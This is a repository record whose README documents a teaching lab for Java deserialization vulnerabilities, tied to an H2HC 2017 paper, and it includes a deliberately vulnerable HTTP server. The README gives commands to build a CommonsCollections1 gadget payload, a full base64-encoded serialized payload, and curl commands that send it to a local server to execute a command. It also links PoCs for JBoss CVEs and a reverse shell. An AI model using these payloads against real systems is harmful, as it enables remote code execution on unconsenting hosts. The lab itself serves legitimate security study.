{"id":13363104,"url":"https://github.com/joaomatosf/JavaDeserH2HC","last_synced_at":"2025-03-12T15:31:02.558Z","repository":{"id":87910208,"uuid":"103146553","full_name":"joaomatosf/JavaDeserH2HC","owner":"joaomatosf","description":"Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).","archived":false,"fork":false,"pushed_at":"2022-03-11T17:18:27.000Z","size":966,"stargazers_count":491,"open_issues_count":2,"forks_count":117,"subscribers_count":23,"default_branch":"master","last_synced_at":"2024-11-18T10:36:36.540Z","etag":null,"topics":["deserialization","java","javadeser","jboss","jvm","lab","poc","reverse-shell","vulnerability"],"latest_commit_sha":null,"homepage":null,"language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/joaomatosf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-09-11T14:31:14.000Z","updated_at":"2024-11-01T02:37:42.000Z","dependencies_parsed_at":null,"dependency_job_id":"aa2edbcd-f387-43a2-bd70-b09636086861","html_url":"https://github.com/joaomatosf/JavaDeserH2HC","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2FJavaDeserH2HC","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2FJavaDeserH2HC/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2FJavaDeserH2HC/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2FJavaDeserH2HC/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/joaomatosf","download_url":"https://codeload.github.com/joaomatosf/JavaDeserH2HC/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243242728,"owners_count":20259809,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["deserialization","java","javadeser","jboss","jvm","lab","poc","reverse-shell","vulnerability"],"created_at":"2024-07-29T23:01:15.604Z","updated_at":"2025-03-12T15:31:01.889Z","avatar_url":"https://github.com/joaomatosf.png","language":"Java","funding_links":[],"categories":["Resources"],"sub_categories":["Conferences and Slides"],"readme":"# Lab for Java Deserialization Vulnerabilities\n\nThis content is related to the paper written for the 12th edition of H2HC magazine. \nSee full paper in: https://www.h2hc.com.br/revista/\n\nSlides and video of the talk will be available soon.\n\n\u003eUm overview sobre as bases das falhas de desserialização nativa em ambientes Java (JVM)\n\n\u003eAn overview of deserialization vulnerabilities in the Java Virtual Machine (JVM)\n\nContent\n--\nThe lab contains code samples that help you understand deserialization vulnerabilities and how gadget chains exploit them. \nThe goal is to provide a better understanding so that you can develop new payloads and/or better design your environments.\n\nThere is also a vulnerable testing application (VulnerableHTTPServer.java), which helps you test your payloads.\n\nSlides\n--\n\n[![Alt text](https://image.slidesharecdn.com/h2hc2017joaomatosfjavadeser-171025200215/95/an-overview-of-deserialization-vulnerabilities-in-the-java-virtual-machine-jvm-h2hc-2017-1-638.jpg?cb=1508963584)](https://www.slideshare.net/joaomatosf_/an-overview-of-deserialization-vulnerabilities-in-the-java-virtual-machine-jvm-h2hc-2017)\n\n\nExamples (PoC's)\n------\n\n* PoC CVE-2017-7504 - JBossMQ JMS Invocation Layer (https://access.redhat.com/security/cve/cve-2017-7504)\n\n[![Alt text](https://img.youtube.com/vi/jVMr4eeJ2Po/0.jpg)](https://www.youtube.com/watch?v=jVMr4eeJ2Po)\n\n* PoC CVE-2017-12149 - JBoss 6.X and EAP 5.X (https://access.redhat.com/security/cve/cve-2017-12149)\n\n[![Alt text](https://img.youtube.com/vi/JIWMItSA8l0/0.jpg)](https://www.youtube.com/watch?v=JIWMItSA8l0)\n\n* PoC Exploiting struts2-rest XStream Deserialization with Reverse Shell\n\n[![Alt text](https://img.youtube.com/vi/IrZOlqio0nw/0.jpg)](https://www.youtube.com/watch?v=IrZOlqio0nw)\n\n\nLab Usage Examples\n--\nFirst of all you need to read the full paper. Then review the sample codes and use the vulnerable testing application to understand how payloads work.\n\n***Getting JDK***\n\nIf you dont want to go to the Oracle page and register, you can download the JDK directly from me in: http://www.joaomatosf.com/rnp/?prefix=rnp/java_files/\n\nAs **root**, run:\n```\n# cd /opt\n# curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz \n# tar zxvf jdk-8u20-linux-x64.tar.gz\n# rm -rf /usr/bin/java*\n# ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin\n# java -version\n  java version \"1.8.0_20\" \n```\n\n\n***Getting codes:***\n\n```\n$ git clone https://github.com/joaomatosf/JavaDeserH2HC.git\n$ cd JavaDeserH2HC\n```\n\n***Compiling and executing Vulnerable Web Application:***\n\n```\n$ javac VulnerableHTTPServer.java -XDignore.symbol.file\n$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer\n```\n\n\n```\n* =============================================================== *\n*    Simple Java HTTP Server for Deserialization Lab v0.01        *\n*    https://github.com/joaomatosf/JavaDeserH2HC                  *\n* =============================================================== *\nYou can inject java serialized objects in the following formats:\n\n 1) Binary in HTTP POST (ie \\xAC\\xED). Ex:\n   $ curl 127.0.0.1:8000 --data-binary @ObjectFile.ser\n\n 2) Base64 or Gzip+Base64 via HTTP POST parameters. Ex:\n   $ curl 127.0.0.1:8000 -d \"ViewState=H4sICAeH...\"\n   $ curl 127.0.0.1:8000 -d \"ViewState=rO0ABXNy...\"\n\n 3) Base64 or Gzip+Base64 in cookies. Ex:\n   $ curl 127.0.0.1:8000 -H \"Cookie: JSESSIONID=H4sICAeH...\"\n   $ curl 127.0.0.1:8000 -H \"Cookie: JSESSIONID=rO0ABXNy...\"\n   \n 4) Base64 of AES-CBC encrypted with hardcoded Apache Shiro key. Ex:\n   $ curl 127.0.0.1:8000 -H \"Cookie: rememberMe=MTIzNDU2Nzg...\n   \n 5) XML for XStream RCE vulnerability/serialization. Ex:\n   $ curl 127.0.0.1:8000 -d @file.xml\n   \nOBS: To test gadgets in specific libraries, run with -cp param. Ex:\n$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer\n==================================================================\n\nJRE Version: 1.8.0_77\n[INFO]: Listening on port 8000\n```\n\n***Testing payloads***\n\nCompiling example1 that works in applications with commons-collections3.2.1 in the classpath and JRE \u003c 8u72:\n\n```\n$ javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java\n```\n\nGenerating payload:\n\n```\n$ java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 'touch /tmp/h2hc_2017'\nSaving serialized object in ExampleCommonsCollections1.ser\n```\n\nExploiting vulnerable server:\n\nSending the payload in binary format via HTTP POST:\n```\n$ rm -rf /tmp/h2hc_2017\n$ curl 127.0.0.1:8000/ --data-binary @ExampleCommonsCollections1.ser\nData deserialized!\n$ ls -all /tmp/h2hc_2017\n-rw-r--r-- 1 joao joao 0 Sep 13 22:34 /tmp/h2hc_2017\n```\n\nSending the payload in Gzip+Base64 format via HTTP Cookies:\n```\n$ rm -rf /tmp/h2hc_2017\n$ gzip ExampleCommonsCollections1.ser\n$ base64 -w0 ExampleCommonsCollections1.ser.gz\n$ curl 127.0.0.1:8000/ -H \"cookie: JSESSIONID=H4sICMeVuVkAA0V4YW1wbGVDb21tb25zQ29sbGVjdGlvbnMxLnNlcgCVVD1MFEEUfrd3iKDEAxVNiITGqER2kZhIuEKRBCFZlCAS4hU67M3dLuzOrjOz5x0ohY0tBQmxUQut/EmMtYWxMBEl0UZDZ2HURBMtrHVmd+9uAf+44u7tzfu+933vvdn7X6GOUehhPlEpztvY4CoixOWIWy5R+6vhMCm6RhANIZKzMT334seO3cvzdxVQdNjuYGcK0wlk+5hx2KFPoyLSfG7Z2gjyMjqkeNnDHJrDAxuRgjZgI8YyJY9dBYAENMkTVUJUASlR2BP8IVOrykapWyq/P7Da8TI9sKxAQoeEyWF/jDTK1DbIlYUuwTyAcNvp0oKKPGSYWDVcx3EJE7+2BFoydpCn6mi2LHSQD4vXbpbTi0lZrD6PDO7SMofDuqDQQgototBiFNo4RYTlXeqElSn0/aNm3ieSm6kDJrIIzsUIup8vfTk4u5QShrPQZMVORKu7spuT4tMI8jcxcciTic7v747uvaEAlDwxqZQwk/lvM+KJI8JjhJPFheZ+5dFiML4Gq5LBoSU2xjNT04JLyC1SaK7twZhPuOVgqH0211u5FTOYxtRc//RzZu7KSq8CySzUWf20IHq6M7tRig7brBHMTTd3Gjl4rdqznFqkkMmKlFFEkTMudl3QtGR/s+2i/xF9aCmiX1iZvJVmh+xKlxUOjQXMI8MC1BIHhWT3Wt8+XH51vjoZ4NAgMKFKXy57u2QSLUzXoKHW29/u9M5mHp8MoMUgNbgdrQGsTcK8aih4t1hB5/5EGppYM5aAtG0daWK9+6hzD95MfPy8b+5UxUmSQ702ZRGNieutdAnqXdz1DbND446nmT2mcaGn+8gxDilcwkZVVSIoqrHKzgQvkyHETHGR6+pXnz5rvfg6CcogNNouyg0Gl3kYGrhJMTNdO1fyjp8I9V/eKr7SgZOSsNpeUxx7OY5hjomM1hiXEvp+AaGU2MlXBQAA\"\nData deserialized!\n$ ls -all /tmp/h2hc_2017\n-rw-r--r-- 1 joao joao 0 Sep 13 22:47 /tmp/h2hc_2017\n```\n\nUpdate 2022 - Pré-Auth RCE (default installation) in JBoss EAP 5.X/6AS, JBoss Operations Network and others RedHat products\n--\nI've been using these bugs for years in internal engagements. Old but still a gold to lateral inside business/core networks.\nI had already leaked this at the AlligatorCon - Recife (I think at 2018) and in the 2019 Hackers to Hackers Conference (H2HC) Advanced Web Training (with my friends @reefbr and @marcioalm).\n\n***Slides***\n\n[![Alt text](https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.png)](https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoaomatosf%2FJavaDeserH2HC","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjoaomatosf%2FJavaDeserH2HC","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoaomatosf%2FJavaDeserH2HC/lists"}